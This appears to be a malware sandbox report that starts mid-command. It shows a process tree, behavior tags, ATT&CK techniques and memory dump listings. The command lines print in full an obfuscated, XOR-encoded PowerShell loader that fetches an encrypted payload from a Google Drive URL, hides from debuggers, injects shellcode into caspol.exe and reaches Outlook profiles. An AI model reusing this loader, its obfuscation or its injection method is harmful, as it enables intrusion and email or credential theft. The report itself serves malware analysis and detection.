Nr'InhTitgatWipSksKu:La/ac/TrdCerIniSuvWoeOp.SagHyoOnonagSelVeepa.IncDeoBlmno/InuSpcPi?MeeRaxgaprooNorPrtWh=IsdFooHowConUnlSwoseaHvdTe&PriindAg=Bo1SpdTrzAigRe1Hy9Mo2Bo6mepbenMaDFimLe9Je3An5MadSe_DrCOpmVi4apTBlRDrEReqDazGuXBr4KljHa7SuoSlxInJsilKo'mu;Ju`$miSNitTirInmSheAnrNaeHanStsjo1pe3Sw9Ta0He0Ha br=Ha UnHNoTKaBKo He'IcFRe6Br9NoDhaATi4HaBDe7FiACo0ChAEx1foABu2CaBSe7FoBFeCHaBne6KoBDe7SyFCa2InEAtFMoFUn2AmFPoAss9GrCWaBpr7StARe5KaFPiFAf9UeDSuBDu0SaBWa8BiBHe7GoBBe1GlAFe6ToFMa2Wr9raCReBUd7TrAgr6CaFGeCal8Cl5LeBBa7ClBAl0rh9So1SyBLuEHuBSmBpaBKi7SpBafCSkAKo6AnFGeBSkFBeCPe9Bi6SnBTrDDeABo5InBMiCAsBDrEEnBKaDTyBSu3AdBCl6Fi8Ne1KaAPr6FiAIn0MaBMaBSmBSkCUdBCu5SyFdoAInFCy6Bi8Ex1agAUn6huADa0SpBCoFPaBIn7HeAsn0jaBFo7UdBSwCSkANa1WiEGo3VaEPa1AmEInBDeEHa2ThESa3SkFlaBBu'Ne;Ta`$ApvPaiFoeFotsm8Ph Sw=Av KaHDrTTiBPy As'TrFja6Pu8Du0SmBim7KvARi1FaASu6enBPe7MeEBi0CoEChFUnFIn6AvBRe7SkBViCBiADi4CyEUn8AfBVo3FuASp2ElAPh2EmBVe6ReBDk3IsATu6StBPr3Fo'sk;Co&St(Ka`$SaYChaKorChdBuiFn7He)se Wa`$cavraiTaeArtFr8Vr;Bi`$ByRLieDesKatReeSo2st=Tr`$LeRAteHesEntBeere2Su+ba'Kr\NoACapUdoKosUntGeiColUdsMo.KodMiaNotBo'ch;Be`$TaOEkvNueInrHysRapWaeTrnAadFaeSt=Ko'fi'Aa;BeiKrfSa le(Su-SpnHuonotAm(NeTKueCcsLetDi-KoPCraChtRohMa By`$fiRWaeVisoptTresy2Ud)gr)Be Un{SmwFrhPsiDilGreAv Fr(Va`$UdOTrvNyeRirAlsTrpAfeStnPadSoeTo Ld-MoeChqLa An'Sn'Va)Bd Es{pa&Bi(Pe`$LiYlaaAsrCudAfigr7Or)Ek Ma`$AfSSetForkamSeeArrLaeKanUnsBu1Sy3Im9ce0Ae0hu;AlSBotSlaParbatCi-InSBalUseTreBepVo Se5In;Fo}DeSReeSotCo-StCAsoLgnEltKaeStnpltCi Fo`$EmRUdeAtsbetBoeca2Bi ha`$PrOPivScefarPosCapOpeScnUbdPreSa;Mo}Ga`$LoOCavhueNarSmsMapAteFlnUndReeBr Ko=st snGMaeOrtSt-FrCLaoPlndatKreOpnLetVa Dr`$EkRMiePhsHatIneSe2Be;Op`$QuvTeiAneNstBe9Io Po=Ki UdHStTTrBHu ba'BuFPe6PaARy4OtBVeBTuBOn7BrAOs6DoFsl2AbECiFPrFAn2Tr8He9Pe8Sv1SkALeBLsAAr1AbALa6BoBSo7ReBKeFbuFBlCOr9Fo1UhBUpDDuBDiCSaASy4OoBRe7BrARe0ScAOp6Ki8ReFHoEFo8InESc8na9Pa4UnABl0UdBWlDDoBExFDi9St0DeBFr3FiAUb1biBEl7RaERe4riERe6Mi8Aa1AlAEu6BuAHe0KyBSiBUnBSlCDaBDe5OsFAfAZiFIn6Bu9MrDCeAUd4PaBSp7UnAHa0TiARe1reAAl2SiBFe7HaBUnCGaBDr6kuBFr7InFAdBJo'Pe;Re&Ta(Ri`$ceYHyaTvrcadViiSp7No)mi Un`$ThvWeiSoeSttFo9ko;un`$inORevEveKarelsBapInePanHadBieSa0Fi Sv=Fr waHmuTOlBSt Ud'Ni8Ov9Ko8Tr1TrAsmBDiAan1UnADe6NoBSv7EtBMeFCaFOvCPr8Ex0grASn7DiBElCUnAEx6brBBeBWiBSuFLoBSt7StFNoCSy9NgBLyBvaCChADo6SwBEn7SuASt0LoBbeDUpAAn2Po8Ac1ChBRe7prAMa0PrAIg4CeBUnBBaBUn1ovBGa7PrAUn1DiFbrCDe9unFTiBTr3UpAPr0RuAHa1KaBKnAHaBBi3BoBObEre8HaFReEAu8ZeEfe8Od9Re1AsBbeDGrACo2WaAOfBOdFHeABrFBe6KoASl4AmBCoBSlBSu7FiAUn6BaFCaEUdFmi2HoEUn2LeFDeEAfFSk2EnFFo2TaFRe6Th8De0CyBTw7HeACo1HiAWo6SeBhu7PeEKn1GaFAeEEpFVa2BiECa4PeESt6ToEPa3CaFleBVe'No;Ba&En(Pi`$BoYSuaForSkdSuiBe7Am)Er No`$giOJovVoedurtrsBapOeeAunWodfoest0En;Sl`$PhHNeiFeeCrrKn1In4Ve7Ti=Af`$LyvTriVaeMotFe.SacOvoGuuVinlatUn-Co6Pa4Fo1Sa;ps`$trOBavReebarEgsJipPeeGenstdUnedo1Br Hy=Sw SeHJoTEnBTi Un'Un8Ha9Ce8Mo1UnAKeBKnAhi1SrAAn6PrBOr7OvBStFboFWaCsp8Ex0MaAFi7fiBRuCReAFl6OvBReBCoBPeFdiBTa7HeFSoCBj9OpBGaBReCKrASe6WaBHa7MaATi0UnBBrDMuABr2Di8Pr1ShBHy7UnAGe0LeAun4StBKoBreBTi1SiBTi7FeAWr1UhFveCJr9VaFLiBSk3SpAAf0guABl1heBLoAExBDi3BiBSyEGu8DiFBeEsa8ToEPr8In9Op1LeBKaDToARe2PrADiBInFEgABaFFo6HaAUn4EcBTrBDiBCl7StAPn6EpFUrEUnFUn2EqESp4NaECe6InEgo3DaFsoEWiFSu2StFGo6De8Mi0SaBTr7BiBQu3PrBMaEPrBfi0SaBUn7trBsp6StBTr7AbBskFYdFOxEjaFCh2VaFFu6Sy9SoAEkBSoBKoBRu7SpAEn0CaESp3opEDi6AaEFo5DuFFuBVa'tr;Si&Sa(Sl`$QuYAcahorDidStiSo7Un)Bi tr`$meOEnvdaeHirBrsUnpYaePrnFydokeDi1Un;Bi`$HaOBrvAdeperfasCapMieLinSudRieSy2Co Ke=Su ExHReTVoBGe Se'FlFAr6Eu8ta1PoAGu6KoATe0PuBDiDSoBNa5PnBMi3MoFSp2LaEUbFJaFOp2Om8Mi9Tu8Ct1AnADoBSqAco1DeADg6BeBMe7EuBudFAlFBoCPn8Ps0CaASt7ReBCoCCoASt6KoBboBGaBInFPhBTa7StFReCNo9BaBPrBSkCAcAKn6NoBav7KvABr0PaBNdDFlAOs2El8Ba1MaBDo7AmAPa0BaAre4UnBobBQuBBe1SlBLa7ThATi1KlFKrCBe9UnFPeBCa3MaAFo0niAen1PrBmuASkBda3LnBLiERu8RuFKrEVi8MoEne8Ox9Lo5ScBNo7KuAme6An9St6SuBCo7CoBFlEMaBPe7AmBIn5ReBRe3FuARe6VeBDy7De9Ba4ReBLaDKaAAu0Fa9Fo4urAwo7UdBHaCMoBSe1FaATi6PoBBrBhyBOuDTiBFoCTh8No2SiBcoDUnBAfBEfBScCshAFo6SuBSt7tkAAf0VaFBeAExFNoABaBRu4BuBIm9SoAHa2ShFNo2FjFFr6Pi8Sl0MaACr7ArBTe0CaBSm7OcBbe4OrBPu3SiBSt1BiADe6StFTw2FoFPh6Di9MaDudASa4OoBEx7SpAPo0CiAIn2FoFDoBDeFFlEReFPe2CoFMoACo9Ve5Tr9De6As8Co6DeFPe2Gu9Co2SeFAtATa8Ri9Fo9MoBAfBMnCSaABu6Do8Ze2BaARe6ArARa0Ko8AlFHaFReEAfFOv2Un8Co9kd9BaBRuBTrCDrAUl6Pe8Um2GaANe6EpANa0Gr8TiFNiFSpEHaFgy2na8So9Ud9HaBEnBFlCMaAIn6Ja8St2KoAPu6InAAf0Te8SkFStFPsESoFRe2Fi8Cr9co9HoBSkBLfCBeATr6Ce8Be2MyABl6PoAPr0In8PiFPrFunEMyFAl2Ra8Ly9En9KvBnoBKrCAmAPh6te8Fo2GrALy6JaASy0Re8TiFFaFNaBUbFSo2FiFExARu8La9ty9LaBVlBSpCGaAUn6Im8Ha2akAPo6OrAGa0Gr8TrFGtFRuBidFTrBGrFLoBFl'Cr;Ge&Bo(Jv`$OuYOvaHorTudSiiOp7An)Un Sk`$SuOpavDoeMorCasBopDeeTrnIndGleIn2Fo;Fr`$hyOSmvSceParShsUnpHoeTenEmdVuePa3Fr St=Pa UnHFoTPaBTa Si'LaFDe6Im8Pr1BaAse6UnAek0KaBKaDBrBBi5stBco3ViFUdCCo9BoBFaBEtCspAad4HaBUnDUnBAu9DoBCo7OvFIdAAcFOf6Ha8Ca0ilBAf7MeAOp1ToAUn6FuBba7PrEFo1AlFDuESrFFo6Sm8Re0coBTe7AnBEx3FlBLaEReBUn0InBUp7AgBLg6FrBMa7AdBHeFNyFSoEPrFRo6Fr8Br6PaAMo5ExBOvBStBdr1AkBRe9KiAIn2HoBRaEFoAAu7AkFReEMeEDu2StFOcEShEVe2PrFInBUn'Th;Gl&Me(Di`$ReYInaParRadbliAs7Un)In ve`$ToOBrvFoeWarKosSepvaeThnXvdMieCa3Ka#St;""";Function Overspende9 { param([String]$uegennytti); For($Mendicplant216=2; $Mendicplant216 -lt $uegennytti.Length-1; $Mendicplant216+=(2+1)){$Strmerens139 = $Strmerens139 + $uegennytti.Substring($Mendicplant216, 1)}; $Strmerens139;}$Bortska0 = Overspende9 'CaIGdEExXPr ';$Bortska1= Overspende9 $Ligh;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Bortska1 ;}else{&$Bortska0 $Bortska1;}"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$uegennytti); $Eksam = ''; Write-Host $Eksam; Write-Host $Eksam; Write-Host $Eksam; $Unhasti = New-Object byte[] ($uegennytti.Length / 2); For($Mendicplant216=0; $Mendicplant216 -lt $uegennytti.Length; $Mendicplant216+=2){ $Unhasti[$Mendicplant216/2] = [convert]::ToByte($uegennytti.Substring($Mendicplant216, 2), 16); $Unhasti[$Mendicplant216/2] = ($Unhasti[$Mendicplant216/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($Unhasti);}$polarisati0=HTB '81ABA1A6B7BFFCB6BEBE';$polarisati1=HTB '9FBBB1A0BDA1BDB4A6FC85BBBCE1E0FC87BCA1B3B4B79CB3A6BBA4B79FB7A6BABDB6A1';$polarisati2=HTB '95B7A682A0BDB193B6B6A0B7A1A1';$polarisati3=HTB '81ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4';$polarisati4=HTB 'A1A6A0BBBCB5';$polarisati5=HTB '95B7A69FBDB6A7BEB79AB3BCB6BEB7';$polarisati6=HTB '808681A2B7B1BBB3BE9CB3BFB7FEF29ABBB6B790AB81BBB5FEF282A7B0BEBBB1';$polarisati7=HTB '80A7BCA6BBBFB7FEF29FB3BCB3B5B7B6';$polarisati8=HTB '80B7B4BEB7B1A6B7B696B7BEB7B5B3A6B7';$polarisati9=HTB '9BBC9FB7BFBDA0AB9FBDB6A7BEB7';$Yardi0=HTB '9FAB96B7BEB7B5B3A6B786ABA2B7';$Yardi1=HTB '91BEB3A1A1FEF282A7B0BEBBB1FEF281B7B3BEB7B6FEF293BCA1BB91BEB3A1A1FEF293A7A6BD91BEB3A1A1';$Yardi2=HTB '9BBCA4BDB9B7';$Yardi3=HTB '82A7B0BEBBB1FEF29ABBB6B790AB81BBB5FEF29CB7A581BEBDA6FEF284BBA0A6A7B3BE';$Yardi4=HTB '84BBA0A6A7B3BE93BEBEBDB1';$Yardi5=HTB 'BCA6B6BEBE';$Yardi6=HTB '9CA682A0BDA6B7B1A684BBA0A6A7B3BE9FB7BFBDA0AB';$Yardi7=HTB '9B978A';$Yardi8=HTB '8E';$Rubefact=HTB '87819780E1E0';$Overp=HTB '91B3BEBE85BBBCB6BDA582A0BDB193';function fkp {Param ($Deysosp, $Emanatis) ;$viet0 =HTB 'F69AB7AAB3B7F2EFF2FA8993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC95B7A693A1A1B7BFB0BEBBB7A1FAFBF2AEF285BAB7A0B7FF9DB0B8B7B1A6F2A9F2F68DFC95BEBDB0B3BE93A1A1B7BFB0BEAB91B3B1BAB7F2FF93BCB6F2F68DFC9EBDB1B3A6BBBDBCFC81A2BEBBA6FAF68BB3A0B6BBEAFB89FFE38FFC97A3A7B3BEA1FAF6A2BDBEB3A0BBA1B3A6BBE2FBF2AFFBFC95B7A686ABA2B7FAF6A2BDBEB3A0BBA1B3A6BBE3FB';&($Yardi7) $viet0;$viet5 = HTB 'F681B9A0BBB6A6F2EFF2F69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE0FEF28986ABA2B7898F8FF292FAF6A2BDBEB3A0BBA1B3A6BBE1FEF2F6A2BDBEB3A0BBA1B3A6BBE6FBFB';&($Yardi7) $viet5;$viet1 = HTB 'A0B7A6A7A0BCF2F681B9A0BBB6A6FC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FA8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B48FFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4FAFA9CB7A5FF9DB0B8B7B1A6F29BBCA682A6A0FBFEF2FAF69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE7FBFBFC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FAF696B7ABA1BDA1A2FBFBFBFBFEF2F697BFB3BCB3A6BBA1FBFB';&($Yardi7) $viet1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Pension,[Parameter(Position = 1)] [Type] $Mendic = [Void]);$viet2 = HTB 'F680B7A1A7A0A0F2EFF28993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC96B7B4BBBCB796ABBCB3BFBBB193A1A1B7BFB0BEABFAFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC93A1A1B7BFB0BEAB9CB3BFB7FAF6A2BDBEB3A0BBA1B3A6BBEAFBFBFEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC97BFBBA6FC93A1A1B7BFB0BEAB90A7BBBEB6B7A093B1B1B7A1A18FE8E880A7BCFBFC96B7B4BBBCB796ABBCB3BFBBB19FBDB6A7BEB7FAF6A2BDBEB3A0BBA1B3A6BBEBFEF2F6B4B3BEA1B7FBFC96B7B4BBBCB786ABA2B7FAF68BB3A0B6BBE2FEF2F68BB3A0B6BBE3FEF28981ABA1A6B7BFFC9FA7BEA6BBB1B3A1A696B7BEB7B5B3A6B78FFB';&($Yardi7) $viet2;$viet3 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB791BDBCA1A6A0A7B1A6BDA0FAF6A2BDBEB3A0BBA1B3A6BBE4FEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC91B3BEBEBBBCB591BDBCA4B7BCA6BBBDBCA18FE8E881A6B3BCB6B3A0B6FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet3;$viet4 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB79FB7A6BABDB6FAF68BB3A0B6BBE0FEF2F68BB3A0B6BBE1FEF2F69FB7BCB6BBB1FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet4;$viet5 = HTB 'A0B7A6A7A0BCF2F680B7A1A7A0A0FC91A0B7B3A6B786ABA2B7FAFB';&($Yardi7) $viet5 ;}$Monograms = HTB 'B9B7A0BCB7BEE1E0';$viet6 = HTB 'F6A1B9A7B7A1A2F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F69FBDBCBDB5A0B3BFA1F2F68BB3A0B6BBE6FBFEF2FA959686F292FA899BBCA682A6A08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $viet6;$Twickplu = fkp $Yardi5 $Yardi6;$viet7 = HTB 'F680B7A1A6B7E1F2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E6E3FEF2E2AAE1E2E2E2FEF2E2AAE6E2FB';&($Yardi7) $viet7;$viet8 = HTB 'F680B7B3BEB0B7B6B7BFF2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E7E0E6E3E2EAEAFEF2E2AAE1E2E2E2FEF2E2AAE6FB';&($Yardi7) $viet8;$Strmerens13901 = 'https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl';$Strmerens13900 = HTB 'F69DA4B7A0A1A2B7BCB6B7F2EFF2FA9CB7A5FF9DB0B8B7B1A6F29CB7A6FC85B7B091BEBBB7BCA6FBFC96BDA5BCBEBDB3B681A6A0BBBCB5FAF681A6A0BFB7A0B7BCA1E3E1EBE2E3FB';$viet8 = HTB 'F680B7A1A6B7E0EFF6B7BCA4E8B3A2A2B6B3A6B3';&($Yardi7) $viet8;$Reste2=$Reste2+'\Apostils.dat';$Overspende='';if (-not(Test-Path $Reste2)) {while ($Overspende -eq '') {&($Yardi7) $Strmerens13900;Start-Sleep 5;}Set-Content $Reste2 $Overspende;}$Overspende = Get-Content $Reste2;$viet9 = HTB 'F6A4BBB7A6F2EFF28981ABA1A6B7BFFC91BDBCA4B7A0A68FE8E894A0BDBF90B3A1B7E4E681A6A0BBBCB5FAF69DA4B7A0A1A2B7BCB6B7FB';&($Yardi7) $viet9;$Overspende0 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E2FEF2F2F680B7A1A6B7E1FEF2E4E6E3FB';&($Yardi7) $Overspende0;$Hier147=$viet.count-641;$Overspende1 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E4E6E3FEF2F680B7B3BEB0B7B6B7BFFEF2F69ABBB7A0E3E6E5FB';&($Yardi7) $Overspende1;$Overspende2 = HTB 'F681A6A0BDB5B3F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F680A7B0B7B4B3B1A6F2F69DA4B7A0A2FBFEF2FA959686F292FA899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $Overspende2;$Overspende3 = HTB 'F681A6A0BDB5B3FC9BBCA4BDB9B7FAF680B7A1A6B7E1FEF680B7B3BEB0B7B6B7BFFEF686A5BBB1B9A2BEA7FEE2FEE2FB';&($Yardi7) $Overspende3#"
          3⤵
          • Blocklisted process makes network request
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
            4⤵
            • Checks QEMU agent file
            • Accesses Microsoft Outlook profiles
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:964

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Collection

    Email Collection

    1
    T1114

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/920-73-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-86-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-89-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-88-0x0000000005B60000-0x0000000009998000-memory.dmp
      Filesize

      62.2MB

    • memory/920-85-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-68-0x0000000073040000-0x00000000735EB000-memory.dmp
      Filesize

      5.7MB

    • memory/920-62-0x0000000000000000-mapping.dmp
    • memory/920-74-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/920-63-0x0000000075D01000-0x0000000075D03000-memory.dmp
      Filesize

      8KB

    • memory/920-69-0x0000000076F50000-0x00000000770F9000-memory.dmp
      Filesize

      1.7MB

    • memory/920-65-0x0000000073040000-0x00000000735EB000-memory.dmp
      Filesize

      5.7MB

    • memory/920-67-0x0000000005B60000-0x0000000009998000-memory.dmp
      Filesize

      62.2MB

    • memory/964-78-0x0000000076F50000-0x00000000770F9000-memory.dmp
      Filesize

      1.7MB

    • memory/964-81-0x0000000000400000-0x0000000000615000-memory.dmp
      Filesize

      2.1MB

    • memory/964-82-0x0000000000401000-0x0000000000615000-memory.dmp
      Filesize

      2.1MB

    • memory/964-72-0x00000000000C768E-mapping.dmp
    • memory/964-92-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/964-90-0x0000000076F50000-0x00000000770F9000-memory.dmp
      Filesize

      1.7MB

    • memory/964-87-0x0000000000620000-0x0000000004458000-memory.dmp
      Filesize

      62.2MB

    • memory/964-84-0x0000000000400000-0x0000000000430000-memory.dmp
      Filesize

      192KB

    • memory/964-80-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/964-93-0x0000000077130000-0x00000000772B0000-memory.dmp
      Filesize

      1.5MB

    • memory/964-75-0x0000000000620000-0x0000000004458000-memory.dmp
      Filesize

      62.2MB

    • memory/1636-54-0x0000000000000000-mapping.dmp
    • memory/1812-59-0x000007FEF3A60000-0x000007FEF45BD000-memory.dmp
      Filesize

      11.4MB

    • memory/1812-60-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

    • memory/1812-66-0x0000000002784000-0x0000000002787000-memory.dmp
      Filesize

      12KB

    • memory/1812-56-0x0000000000000000-mapping.dmp
    • memory/1812-61-0x000000001B730000-0x000000001BA2F000-memory.dmp
      Filesize

      3.0MB

    • memory/1812-91-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

    • memory/1812-58-0x000007FEF45C0000-0x000007FEF4FE3000-memory.dmp
      Filesize

      10.1MB

    • memory/1812-64-0x000000000278B000-0x00000000027AA000-memory.dmp
      Filesize

      124KB

    • memory/1952-55-0x000007FEFB971000-0x000007FEFB973000-memory.dmp
      Filesize

      8KB